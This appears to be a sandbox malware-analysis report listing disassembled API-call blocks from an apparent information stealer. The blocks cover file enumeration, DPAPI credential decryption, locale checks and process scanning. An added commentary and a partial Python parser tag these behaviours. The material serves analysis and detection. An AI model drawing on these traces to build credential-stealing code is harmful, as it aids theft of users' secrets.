                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                    • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                                                    • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                    • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 02D1F985
                                                                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 02D1F9D6
                                                                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 02D1F9EC
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1FD18
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1FD2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                    • Instruction ID: 9830ccefbec5e7ad5708581cdeb3d0d8780ffb1ede18b722617bd13499c2e083
                                                                                    • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                    • Instruction Fuzzy Hash: E3B11071900228EBCB24FF60DD95EEE737AEF65304F4081A9944A56650EF319F49CFA1
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                    • String ID: \*.*$@
                                                                                    • API String ID: 433455689-2355794846
                                                                                    • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                    • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                                                    • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                    • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 02D11B8A
                                                                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 02D11BDA
                                                                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 02D11BF0
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D11FA7
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D12031
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D12087
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D12099
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1415058207-0
                                                                                    • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                    • Instruction ID: eb4ca3e403c2f08160a8d4297ffa629db55e53ca92ef40468b56c4801151ec00
                                                                                    • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                    • Instruction Fuzzy Hash: 4D12C071914228EBCF19EB60DD94EED737AEF64704F4041A9A50A66690EF706F8CCF60
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 02D1E0C5
                                                                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 02D1E115
                                                                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 02D1E12B
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1E647
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1E659
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2325840235-0
                                                                                    • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                    • Instruction ID: 5fd3b62a91358be6d28c7f757882d9d383de9ffc8434f6491d47793cd05ec55f
                                                                                    • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                    • Instruction Fuzzy Hash: DEF19075914238DACB19EB60DD94EEEB33AEF64704F8051DAA04A62550EF346F8DCF60
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D1CABA
                                                                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02D1CAD8
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02D1CAE3
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02D1CB79
                                                                                    • lstrcat.KERNEL32(?,00420B46), ref: 02D1CBAA
                                                                                    • lstrcat.KERNEL32(?,00420B47), ref: 02D1CBBE
                                                                                    • lstrcat.KERNEL32(?,00420B4E), ref: 02D1CBDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 1498829745-0
                                                                                    • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                    • Instruction ID: 0e9cdc6e11c07c319578700b75d19e87b7154ab819ddfcaa1ff856a8cc5b99f8
                                                                                    • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                    • Instruction Fuzzy Hash: DF417178944219EFDB10DFD0ED88BEEBBB9BB44304F1045A9E509A6280D7745A84CF92
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0040C853
                                                                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E35F60), ref: 0040C871
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                    • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                    • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                    • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 1498829745-0
                                                                                    • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                    • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                                                    • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                    • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID: N@
                                                                                    • API String ID: 4291131564-4229412743
                                                                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02D27E48
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02D27E60
                                                                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 02D27E74
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D27EC9
                                                                                    • LocalFree.KERNEL32(00000000), ref: 02D27F89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3090951853-0
                                                                                    • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                    • Instruction ID: ba3c82c63891615024c709c063a6017c731f091b2c7a0909ee4a9b1f35a66ed0
                                                                                    • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                    • Instruction Fuzzy Hash: 91413871945228EBDB24DF94DC88BEDB3B5EB54708F104199E009A6290DB346F89CFA0
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 02D2BE09
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D2BE1E
                                                                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02D2BE29
                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 02D2BE45
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 02D2BE4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 2579439406-0
                                                                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                    • Instruction ID: a52ab96fe1d640f57b8c449797262d8359e57c31ce0bb4dc0f386393e24511a7
                                                                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                    • Instruction Fuzzy Hash: 6D21A5BC5002159FDB14DF69F8856963BF4FB0A318F50403AE90987364DBB05D85EF49
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02D174B4
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D174BB
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D174E8
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 02D1750B
                                                                                    • LocalFree.KERNEL32(?), ref: 02D17515
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                    • String ID:
                                                                                    • API String ID: 2609814428-0
                                                                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction ID: 6a7893c3fde123bf84894a3c8250eaa7e7fc81cefcd583bc8cbb2f33e2230e60
                                                                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction Fuzzy Hash: B8010075A80208BBEB10DFD4DD45F9D77B9EB44704F104155F705AA2C0D770AA00CB65
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                    • String ID:
                                                                                    • API String ID: 3657800372-0
                                                                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D29885
                                                                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 02D29899
                                                                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 02D298AE
                                                                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 02D298C3
                                                                                    • CloseHandle.KERNEL32(00420ACA), ref: 02D298E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction ID: 044d35c04d6270df2b7ffbdb2f91f29e2262a5997f40b477c87aa300f8ddf1e6
                                                                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction Fuzzy Hash: 76014C79A40218FFCB20DFE4CC54BEDB7F9EF19304F144189A505A6240D7759A44CF61
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                                                    • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
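The "APIs" blocks above are the most useful part of this report for an analyst: the FindFirstFileA/StrCmpCA/FindNextFileA loop is a directory walk, the CryptStringToBinaryA blocks decode an encoded string, the CryptUnprotectData blocks decrypt a DPAPI blob and convert the result from UTF-16 to ANSI, the GetKeyboardLayoutList/GetLocaleInfoA block enumerates installed keyboard languages (the locale check behind the "may stop execution after checking locale" signature), and the CreateToolhelp32Snapshot/Process32Next/StrCmpCA block walks the process list comparing image names. Two caveats are worth automating. First, the IsDebuggerPresent block that ends in GetCurrentProcess/TerminateProcess with C0000409 (STATUS_STACK_BUFFER_OVERRUN) on the stack is the MSVC CRT's __raise_securityfailure path for a /GS cookie failure, which every /GS-compiled binary contains, so on its own it is not evidence of anti-debugging. Second, several functions appear twice with the same Opcode ID, once in the dump based on the PE at 00400000 and once in the region at 02D10000 that is not PE-based, which is the unpacked copy the "overwrites its own PE header" signatures refer to. The script below is an added example, not part of the Joe Sandbox report: it parses blocks in this format, tags each with a behaviour, applies the CRT caveat, and reports Opcode IDs shared across dumps. Its SAMPLE text is constructed from blocks shown above (addresses and IDs copied, long argument lists cut to "...") and the "Part of subcall" lines are treated as the callee's imports rather than the function's own.

```python
"""Tag Joe Sandbox 'APIs' blocks with the behaviour they implement.

Added example for this report page: parser, rules and SAMPLE are mine, not
Joe Sandbox output. SAMPLE is constructed from blocks shown in the report
(addresses and IDs copied; long argument lists cut to '...').
"""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 02D2BE09
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D2BE1E
• UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02D2BE29
• GetCurrentProcess.KERNEL32(C0000409), ref: 02D2BE45
• TerminateProcess.KERNEL32(00000000), ref: 02D2BE4C
• Source File: 00000001.00000002.2054417626....sdmp, Offset: 02D10000, based on PE: false
• Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 02D174B4
• RtlAllocateHeap.NTDLL(00000000), ref: 02D174BB
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D174E8
• WideCharToMultiByte.KERNEL32(...), ref: 02D1750B
• LocalFree.KERNEL32(?), ref: 02D17515
• Source File: 00000001.00000002.2054417626....sdmp, Offset: 02D10000, based on PE: false
• Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
APIs
• GetProcessHeap.KERNEL32(00000008,00000400,...), ref: 0040724D
• HeapAlloc.KERNEL32(00000000,...), ref: 00407254
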